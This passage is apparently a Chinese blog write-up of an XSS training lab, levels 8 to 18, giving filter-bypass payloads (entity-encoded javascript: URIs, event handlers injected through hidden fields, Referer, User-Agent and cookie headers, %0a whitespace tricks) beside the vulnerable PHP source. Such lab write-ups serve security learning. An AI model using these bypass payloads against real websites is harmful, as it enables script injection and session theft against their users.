method=GET&gt;</span><br><span class="line">&lt;input name=keyword  value=&quot;&apos;.$str6.&apos;&quot;&gt;</span><br><span class="line">&lt;input type=submit name=submit value=搜索 /&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br><span class="line">果然是 匹配到函数就删除，这样 双写很容易绕过</span><br></pre></td></tr></table></figure>

<h3 id="Less-8"><a href="#Less-8" class="headerlink" title="Less-8"></a>Less-8</h3><blockquote>
<p>测试过滤字符，测试onclick,之后查看友情链接，发现on 被替换了data，script，href等都被替换了，这里前面的方法都失效了，</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-070dae2fdffebfcf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570190584596.png"></p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-827d3cb4419b8c89.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570190610967.png"></p>
<blockquote>
<p>百度一下，发现可以通过编码去绕过，通过html字符实体转换 将 r 换为&amp;#x72</p>
<p>成功绕过替换</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">javascrip&amp;#x74;:alert(22)</span><br><span class="line">javasc&amp;#x72;ipt:alert`1`</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/18851353-086fea2968c66894.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570191396570.png"></p>
<p>看看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = strtolower($_GET[&quot;keyword&quot;]);</span><br><span class="line">$str2=str_replace(&quot;script&quot;,&quot;scr_ipt&quot;,$str);</span><br><span class="line">$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2);</span><br><span class="line">$str4=str_replace(&quot;src&quot;,&quot;sr_c&quot;,$str3);</span><br><span class="line">$str5=str_replace(&quot;data&quot;,&quot;da_ta&quot;,$str4);</span><br><span class="line">$str6=str_replace(&quot;href&quot;,&quot;hr_ef&quot;,$str5);</span><br><span class="line">$str7=str_replace(&apos;&quot;&apos;,&apos;&amp;quot&apos;,$str6);</span><br><span class="line">echo &apos;&lt;center&gt;</span><br><span class="line">&lt;form action=level8.php method=GET&gt;</span><br><span class="line">&lt;input name=keyword  value=&quot;&apos;.htmlspecialchars($str).&apos;&quot;&gt;</span><br><span class="line">&lt;input type=submit name=submit value=添加友情链接 /&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br><span class="line">前面的过滤不说了，引号被编码了，这样html实体无法使用00去截断，</span><br></pre></td></tr></table></figure>

<h3 id="Less-9"><a href="#Less-9" class="headerlink" title="Less-9"></a>Less-9</h3><blockquote>
<p>常规判断<br>这次没有任何回显，只给了不合法，难度比之前的有很大的提升，这次绕过让我忽略了一个问题，友情链接没有网址那叫链接吗，百度了下绕过，发现一只忽略了一个最重要的问题</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">javascrip&amp;#74;:alert(23)//http://www.baidu.com&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/18851353-2bbb4b67ab6eaa73.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570197241007.png"></p>
<p>看看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = strtolower($_GET[&quot;keyword&quot;]);</span><br><span class="line">$str2=str_replace(&quot;script&quot;,&quot;scr_ipt&quot;,$str);</span><br><span class="line">$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2);</span><br><span class="line">$str4=str_replace(&quot;src&quot;,&quot;sr_c&quot;,$str3);</span><br><span class="line">$str5=str_replace(&quot;data&quot;,&quot;da_ta&quot;,$str4);</span><br><span class="line">$str6=str_replace(&quot;href&quot;,&quot;hr_ef&quot;,$str5);</span><br><span class="line">$str7=str_replace(&apos;&quot;&apos;,&apos;&amp;quot&apos;,$str6);</span><br><span class="line">echo &apos;&lt;center&gt;</span><br><span class="line">&lt;form action=level9.php method=GET&gt;</span><br><span class="line">&lt;input name=keyword  value=&quot;&apos;.htmlspecialchars($str).&apos;&quot;&gt;</span><br><span class="line">&lt;input type=submit name=submit value=添加友情链接 /&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">if(false===strpos($str7,&apos;http://&apos;))</span><br><span class="line">&#123;</span><br><span class="line"> echo &apos;&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;您的链接不合法？有没有！&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;&apos;;</span><br><span class="line"> &#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line"> echo &apos;&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;&apos;.$str7.&apos;&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;&apos;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">前面不说了，看看后面，这里需要判断是否存在http:// 判断链接是否合法，这里我们直接在最后添加就可以绕过了</span><br></pre></td></tr></table></figure>

<h3 id="Less-10"><a href="#Less-10" class="headerlink" title="Less-10"></a>Less-10</h3><blockquote>
<p>慢慢的难度提升了，这道题直接闭合不了，基本没有测出来什么东西，抓个包看看吧，也没啥，看看源代码，看到有三个参数是hidden的，尝试传参</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-9fafa705745e1512.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570204862947.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">keyword=1&amp;t_sort=&quot;type=&quot;text&quot; onclick=&quot;alert(24)</span><br><span class="line"></span><br><span class="line">&lt;input name=&quot;t_sort&quot; value=&quot; &quot; type=&quot;text&quot; onclick = &quot;alert(25)&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">type=&quot;text&quot; 指定后可以将hidden内容显示&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<p>创建一个文本框，然后去点击</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-ba2f8df49dc05d13.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570204987345.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;keyword&quot;];</span><br><span class="line">$str11 = $_GET[&quot;t_sort&quot;];</span><br><span class="line">$str22=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str11);</span><br><span class="line">$str33=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str22);</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&apos;&lt;center&gt;</span><br><span class="line">&lt;form id=search&gt;</span><br><span class="line">&lt;input name=&quot;t_link&quot;  value=&quot;&apos;.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_history&quot;  value=&quot;&apos;.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_sort&quot;  value=&quot;&apos;.$str33.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">get 获取两个变量，之后过滤了&lt;&gt; 然后html实体化，之后在t_sort 中通过value赋值绕过引起xss</span><br></pre></td></tr></table></figure>

<h3 id="Less-11"><a href="#Less-11" class="headerlink" title="Less-11"></a>Less-11</h3><p>和10题类似，同样有隐藏的内容，尝试type指定为text查看</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-a9fb4b946d863db0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570242428551.png"></p>
<p>keyword=good job!&amp;t_sort=”type=”text” onclick=”alert(26) 被转义了，看来这里很难绕过了。请教了下百度</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-97ca31f071cca067.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570242567789.png"></p>
<p> 这题先看源码吧</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;keyword&quot;];</span><br><span class="line">$str00 = $_GET[&quot;t_sort&quot;];</span><br><span class="line">$str11=$_SERVER[&apos;HTTP_REFERER&apos;];</span><br><span class="line">$str22=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str11);</span><br><span class="line">$str33=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str22);</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&apos;&lt;center&gt;</span><br><span class="line">&lt;form id=search&gt;</span><br><span class="line">&lt;input name=&quot;t_link&quot;  value=&quot;&apos;.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_history&quot;  value=&quot;&apos;.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_sort&quot;  value=&quot;&apos;.htmlspecialchars($str00).&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_ref&quot;  value=&quot;&apos;.$str33.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br><span class="line">果然，这道题的关键点在str11参数，获取referer处，查看前端源码也可以获取到一个t_ref变量，那么对于str11只过滤了&lt;&gt; 这样就可以使用on去绕过了</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload 抓包 在Referer处添加</span><br><span class="line">“ onmouseover=alert(26) type=&quot;text&quot;&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/18851353-eea57022dca81921.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570243195814.png"></p>
<h3 id="Less-12"><a href="#Less-12" class="headerlink" title="Less-12"></a>Less-12</h3><blockquote>
<p>测试各个位置是否存在xss ，然后记得长个心眼，比如 referer，ua位置也要记得测试</p>
<p>这道题，ua处隐藏了，但是value获取了值，这里很可能存在xss</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-7b6af3dd50b2c246.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570243379119.png"></p>
<p>果然，在ua处添加xss代码成功弹xss</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">&quot; onclick=alert(27) type=&quot;text&quot;&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/18851353-a0cc3f832c6133b3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570243485003.png"></p>
<p>看看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;keyword&quot;];</span><br><span class="line">$str00 = $_GET[&quot;t_sort&quot;];</span><br><span class="line">$str11=$_SERVER[&apos;HTTP_USER_AGENT&apos;];</span><br><span class="line">$str22=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str11);</span><br><span class="line">$str33=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str22);</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&apos;&lt;center&gt;</span><br><span class="line">&lt;form id=search&gt;</span><br><span class="line">&lt;input name=&quot;t_link&quot;  value=&quot;&apos;.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_history&quot;  value=&quot;&apos;.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_sort&quot;  value=&quot;&apos;.htmlspecialchars($str00).&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_ua&quot;  value=&quot;&apos;.$str33.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">和上一题一样，对于ua处只判断了&lt;&gt; 这里使用on事件直接绕过</span><br></pre></td></tr></table></figure>

<h3 id="Less-13"><a href="#Less-13" class="headerlink" title="Less-13"></a>Less-13</h3><blockquote>
<p>同样检查一下源代码，可能存在绕过，看变量那么这道题的关键就是cookie了</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-332e59fae97f8696.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570243622176.png"></p>
<blockquote>
<p>抓包 修改cookie，尝试弹xss</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-3a400589fc87461a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570243693173.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">&quot; onmousedown=alert(28) type=&quot;text&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/18851353-dc5339724c2342ef.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570243732008.png"></p>
<p>看看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">setcookie(&quot;user&quot;, &quot;call me maybe?&quot;, time()+3600);</span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;keyword&quot;];</span><br><span class="line">$str00 = $_GET[&quot;t_sort&quot;];</span><br><span class="line">$str11=$_COOKIE[&quot;user&quot;];</span><br><span class="line">$str22=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str11);</span><br><span class="line">$str33=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str22);</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&apos;&lt;center&gt;</span><br><span class="line">&lt;form id=search&gt;</span><br><span class="line">&lt;input name=&quot;t_link&quot;  value=&quot;&apos;.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_history&quot;  value=&quot;&apos;.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_sort&quot;  value=&quot;&apos;.htmlspecialchars($str00).&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;input name=&quot;t_cook&quot;  value=&quot;&apos;.$str33.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br><span class="line">同12和11 在cookie处返回的时候没有过滤完全导致xss</span><br></pre></td></tr></table></figure>

<h3 id="Less-14"><a href="#Less-14" class="headerlink" title="Less-14"></a>Less-14</h3><blockquote>
<p>查看绕过信息，查看源代码</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;script type=&apos;text/javascript&apos;&gt;window.location.replace(&apos;http://www.exifviewer.org/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTU3MDI1MzMxNCwiaWF0IjoxNTcwMjQ2MTE0LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIybjVhNTFjNXM3dWg3cnY1aW8wMDlya2YiLCJuYmYiOjE1NzAyNDYxMTQsInRzIjoxNTcwMjQ2MTE0NDUyNTIyfQ.T1jdJkux82fMYT9U0brel9BKH1n0876y_n_pLpdTug0&amp;sid=74b4763c-e71f-11e9-875c-26f312502ec5&apos;);&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<p>这关不知道怎么过了，再次百度,</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload  exif viewer的漏洞,漏洞原理是通过修改图片的exif信息</span><br><span class="line"> &quot;&gt;&lt;img src=1 onerror=alert(29)&gt;&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;meta http-equiv=&quot;content-type&quot; content=&quot;text/html;charset=utf-8&quot;&gt;</span><br><span class="line">&lt;title&gt;欢迎来到level14&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;h1 align=center&gt;欢迎来到level14&lt;/h1&gt;</span><br><span class="line">&lt;center&gt;&lt;iframe name=&quot;leftframe&quot; marginwidth=10 marginheight=10 src=&quot;http://www.exifviewer.org/&quot; frameborder=no width=&quot;80%&quot; scrolling=&quot;no&quot; height=80%&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;center&gt;这关成功后不会自动跳转。成功者&lt;a href=/xsschallenge/level15.php?src=1.gif&gt;点我进level15&lt;/a&gt;&lt;/center&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line">这关好像没php代码，果然崩了下一关</span><br></pre></td></tr></table></figure>

<h3 id="Less-15"><a href="#Less-15" class="headerlink" title="Less-15"></a>Less-15</h3><p>15关怎么挂了，看看源码先</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;src&quot;];</span><br><span class="line">echo &apos;&lt;body&gt;&lt;span class=&quot;ng-include:&apos;.htmlspecialchars($str).&apos;&quot;&gt;&lt;/span&gt;&lt;/body&gt;&apos;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>打不成功，查看没有反应，这关考的是对于ng-include 通过文件包含加载xss</p>
<p>放几个网上找来的payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line"></span><br><span class="line">&apos;level1.php?name=&lt;script&gt;alert(30)&lt;/script&gt;&apos;</span><br><span class="line">&apos;level1.php?name=&lt;img src=x onerror=alert(31)&gt;&apos;&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Less-16"><a href="#Less-16" class="headerlink" title="Less-16"></a>Less-16</h3><blockquote>
<p>测试输入，感觉又和之前的比较相似了</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-9048d5550fed076a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570247865284.png"></p>
<p>过滤了script，/ , 空格也被替换了,尝试使用%0a代替空格</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">&lt;svg%0Aonclick=alert(32)&gt;</span><br><span class="line">&lt;img%0Dsrc=1%0Donerror=alert(33)&gt;</span><br><span class="line">&lt;img%0Asrc=1%0Aonerror=alert(34)&gt;</span><br><span class="line">&lt;ifame%0asrc=1%0aonmouseover=alert(35)&gt;&lt;/ifame&gt;&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/18851353-2a28bae31ba6e760.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570248128780.png"><br><img src="https://upload-images.jianshu.io/upload_images/18851353-c8b911ba89f82644.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570248220380.png"><br><img src="https://upload-images.jianshu.io/upload_images/18851353-9385c1bcd2530d7f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570248486260.png"></p>
<p>看看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = strtolower($_GET[&quot;keyword&quot;]);</span><br><span class="line">$str2=str_replace(&quot;script&quot;,&quot;&amp;nbsp;&quot;,$str);</span><br><span class="line">$str3=str_replace(&quot; &quot;,&quot;&amp;nbsp;&quot;,$str2);</span><br><span class="line">$str4=str_replace(&quot;/&quot;,&quot;&amp;nbsp;&quot;,$str3);</span><br><span class="line">$str5=str_replace(&quot;  &quot;,&quot;&amp;nbsp;&quot;,$str4);</span><br><span class="line">echo &quot;&lt;center&gt;&quot;.$str5.&quot;&lt;/center&gt;&quot;;</span><br><span class="line">?&gt;</span><br><span class="line">替换，大小写，之后输出，所以这里需要通过编码绕过&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Less-17"><a href="#Less-17" class="headerlink" title="Less-17"></a>Less-17</h3><blockquote>
<p>传入了两个变量，所以这关有可能xss在其中一个，或者都可能被利用</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-b3df21eca681efdb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570248684745.png"></p>
<p>看看源代码<br><img src="https://upload-images.jianshu.io/upload_images/18851353-7f5884febcbad993.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570248786085.png"></p>
<p>尝试使用on去弹 失败<br><img src="https://upload-images.jianshu.io/upload_images/18851353-c852ba920c8101e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570249111491.png"></p>
<p> 查看下源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;meta http-equiv=&quot;content-type&quot; content=&quot;text/html;charset=utf-8&quot;&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">window.alert = function()  </span><br><span class="line">&#123; </span><br><span class="line">confirm(&quot;完成的不错！&quot;); </span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;title&gt;欢迎来到level17&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;h1 align=center&gt;欢迎来到level17&lt;/h1&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">echo &quot;&lt;embed src=xsf01.swf?&quot;.htmlspecialchars($_GET[&quot;arg01&quot;]).&quot;=&quot;.htmlspecialchars($_GET[&quot;arg02&quot;]).&quot; width=100% heigth=100%&gt;&quot;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;h2 align=center&gt;成功后，&lt;a href=level18.php?arg01=a&amp;arg02=b&gt;点我进入下一关&lt;/a&gt;&lt;/h2&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">通过追加写入src中</span><br></pre></td></tr></table></figure>

<blockquote>
<p>弹不出来 ，难受</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">看看别人是怎么写的</span><br><span class="line">arg01= onmousemove&amp;arg02=alert(36) ，以追加的形式构成xss脚本，</span><br><span class="line">arg01=1&amp;arg02= onmouseover=alert(37) 直接以事件形式弹&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Less-18"><a href="#Less-18" class="headerlink" title="Less-18"></a>Less-18</h3><blockquote>
<p>和17类似 构造事件, 灵异事件 弹不成功</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">arg01= onmousemove&amp;arg02=alert(38) ，以追加的形式构成xss脚本，</span><br><span class="line">arg01=1&amp;arg02= onmouseover=alert(39) 直接以事件形式弹&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<p>源码</p>
